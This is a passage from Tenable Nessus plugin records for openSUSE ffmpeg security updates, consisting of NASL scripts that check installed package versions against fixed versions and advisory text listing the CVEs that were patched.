rpm_check(release:"SUSE42.3", reference:"libpostproc54-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswresample-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswresample1-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswresample1-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswresample2-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswresample2-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswscale-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswscale3-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswscale3-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswscale4-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libswscale4-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libtwolame-devel-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libtwolame0-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libtwolame0-debuginfo-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"twolame-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"twolame-debuginfo-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"twolame-debugsource-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavcodec56-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavcodec56-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavcodec57-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavcodec57-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavdevice56-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavdevice56-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavdevice57-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavdevice57-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavfilter5-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavfilter5-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavfilter6-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavfilter6-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavformat56-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavformat56-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavformat57-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavformat57-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavresample2-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavresample2-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavresample3-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavresample3-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavutil54-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavutil54-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavutil55-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libavutil55-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libmp3lame0-32bit-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libmp3lame0-debuginfo-32bit-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libpostproc53-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libpostproc53-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libpostproc54-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libpostproc54-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswresample1-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswresample1-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswresample2-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswresample2-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswscale3-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswscale3-debuginfo-32bit-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswscale4-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libswscale4-debuginfo-32bit-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libtwolame0-32bit-0.3.13-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"libtwolame0-debuginfo-32bit-0.3.13-2.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ffmpeg / ffmpeg-debuginfo / ffmpeg-debugsource / libavcodec-devel / etc"); }NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-631.NASL description This update for ffmpeg2 fixes security issues, bugs, and enables AC3 and MP3 decoding. The following vulnerabilities were fixed : - CVE-2017-7863: heap-based buffer overflow (bsc#1034179) - CVE-2017-7865: heap-based buffer overflow (bsc#1034177) - CVE-2017-7866: stack-based buffer overflow (bsc#1034176) - CVE-2016-10191: remote code execution (bsc#1022921) - CVE-2016-10190: remote code execution (bsc#1022920) - CVE-2016-10192: remote code execution (bsc#1022922) - CVE-2016-9561: Huge amount memory allocated, resulting in DoS of ffmpeg (bsc#1015120) The following functionality was added : - Enable AC3 and MP3 decoding ffmpeg was updated to 2.8.11, containing a number of upstream improvements and fixes. last seen 2020-06-05 modified 2017-05-30 plugin id 100504 published 2017-05-30 reporter This script is Copyright (C) 2017-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/100504 title openSUSE Security Update : ffmpeg2 (openSUSE-2017-631) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-631. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(100504); script_version("3.3"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-10190", "CVE-2016-10191", "CVE-2016-10192", "CVE-2016-9561", "CVE-2017-7863", "CVE-2017-7865", "CVE-2017-7866"); script_name(english:"openSUSE Security Update : ffmpeg2 (openSUSE-2017-631)"); script_summary(english:"Check for the openSUSE-2017-631 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for ffmpeg2 fixes security issues, bugs, and enables AC3 and MP3 decoding. The following vulnerabilities were fixed : - CVE-2017-7863: heap-based buffer overflow (bsc#1034179) - CVE-2017-7865: heap-based buffer overflow (bsc#1034177) - CVE-2017-7866: stack-based buffer overflow (bsc#1034176) - CVE-2016-10191: remote code execution (bsc#1022921) - CVE-2016-10190: remote code execution (bsc#1022920) - CVE-2016-10192: remote code execution (bsc#1022922) - CVE-2016-9561: Huge amount memory allocated, resulting in DoS of ffmpeg (bsc#1015120) The following functionality was added : - Enable AC3 and MP3 decoding ffmpeg was updated to 2.8.11, containing a number of upstream improvements and fixes." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1015120" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022920" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022921" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022922" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034176" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034177" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034179" ); script_set_attribute( attribute:"solution", value:"Update the affected ffmpeg2 packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg2-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg2-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.2"); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/29"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/30"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.2", reference:"ffmpeg2-debugsource-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"ffmpeg2-devel-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavcodec56-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavcodec56-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavdevice56-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavdevice56-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavfilter5-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavfilter5-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavformat56-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavformat56-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavresample2-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavresample2-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavutil54-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libavutil54-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libpostproc53-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libpostproc53-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswresample1-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswresample1-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswscale3-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", reference:"libswscale3-debuginfo-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavcodec56-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavcodec56-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavdevice56-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavdevice56-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavfilter5-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavfilter5-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavformat56-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavformat56-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavresample2-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavresample2-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavutil54-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libavutil54-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libpostproc53-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libpostproc53-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswresample1-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswresample1-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswscale3-32bit-2.8.11-25.3.1") ) flag++; if ( rpm_check(release:"SUSE42.2", cpu:"x86_64", reference:"libswscale3-debuginfo-32bit-2.8.11-25.3.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ffmpeg2-debugsource / ffmpeg2-devel / libavcodec56 / etc"); }NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-524.NASL description This update for ffmpeg to version 3.3 fixes several issues. These security issues were fixed : - CVE-2016-10190: Heap-based buffer overflow in libavformat/http.c in FFmpeg allowed remote web servers to execute arbitrary code via a negative chunk size in an HTTP response (boo#1022920) - CVE-2016-10191: Heap-based buffer overflow in libavformat/rtmppkt.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check for RTMP packet size mismatches (boo#1022921) - CVE-2016-10192: Heap-based buffer overflow in ffserver.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check chunk size (boo#1022922) - CVE-2017-7859: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the ff_h264_slice_context_init function in libavcodec/h264dec.c (bsc#1034183). - CVE-2017-7862: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame function in libavcodec/pictordec.c (bsc#1034181). - CVE-2017-7863: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame_common function in libavcodec/pngdec.c (boo#1034179) - CVE-2017-7865: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the ipvideo_decode_block_opcode_0xA function in libavcodec/interplayvideo.c and the avcodec_align_dimensions2 function in libavcodec/utils.c (boo#1034177) - CVE-2017-7866: FFmpeg had an out-of-bounds write caused by a stack-based buffer overflow related to the decode_zbuf function in libavcodec/pngdec.c (boo#1034176) These non-security issues were fixed : - Enable ac3 - Enable mp3 decoding - EBU R128 implementation now within ffmpeg, not relying on external library anymore - New video filters last seen 2020-06-05 modified 2017-04-28 plugin id 99722 published 2017-04-28 reporter This script is Copyright (C) 2017-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/99722 title openSUSE Security Update : ffmpeg (openSUSE-2017-524) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-524. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(99722); script_version("3.3"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-10190", "CVE-2016-10191", "CVE-2016-10192", "CVE-2017-7859", "CVE-2017-7862", "CVE-2017-7863", "CVE-2017-7865", "CVE-2017-7866"); script_name(english:"openSUSE Security Update : ffmpeg (openSUSE-2017-524)"); script_summary(english:"Check for the openSUSE-2017-524 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for ffmpeg to version 3.3 fixes several issues. These security issues were fixed : - CVE-2016-10190: Heap-based buffer overflow in libavformat/http.c in FFmpeg allowed remote web servers to execute arbitrary code via a negative chunk size in an HTTP response (boo#1022920) - CVE-2016-10191: Heap-based buffer overflow in libavformat/rtmppkt.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check for RTMP packet size mismatches (boo#1022921) - CVE-2016-10192: Heap-based buffer overflow in ffserver.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check chunk size (boo#1022922) - CVE-2017-7859: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the ff_h264_slice_context_init function in libavcodec/h264dec.c (bsc#1034183). - CVE-2017-7862: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame function in libavcodec/pictordec.c (bsc#1034181). - CVE-2017-7863: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame_common function in libavcodec/pngdec.c (boo#1034179) - CVE-2017-7865: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the ipvideo_decode_block_opcode_0xA function in libavcodec/interplayvideo.c and the avcodec_align_dimensions2 function in libavcodec/utils.c (boo#1034177) - CVE-2017-7866: FFmpeg had an out-of-bounds write caused by a stack-based buffer overflow related to the decode_zbuf function in libavcodec/pngdec.c (boo#1034176) These non-security issues were fixed : - Enable ac3 - Enable mp3 decoding - EBU R128 implementation now within ffmpeg, not relying on external library anymore - New video filters 'premultiply', 'readeia608', 'threshold', 'midequalizer' - Support for spherical videos - New decoders: 16.8 and 24.0 floating point PCM, XPM - New demuxers: MIDI Sample Dump Standard, Sample Dump eXchange demuxer - MJPEG encoding uses Optimal Huffman tables now - Native Opus encoder - Support .mov with multiple sample description tables - Removed the legacy X11 screen grabber, use XCB instead - Removed asyncts filter (use af_aresample instead)" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022920" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022921" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022922" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034176" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034177" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034179" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034181" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034183" ); script_set_attribute( attribute:"solution", value:"Update the affected ffmpeg packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2-32bit"); script_set_attribute(attribute:"cpe", 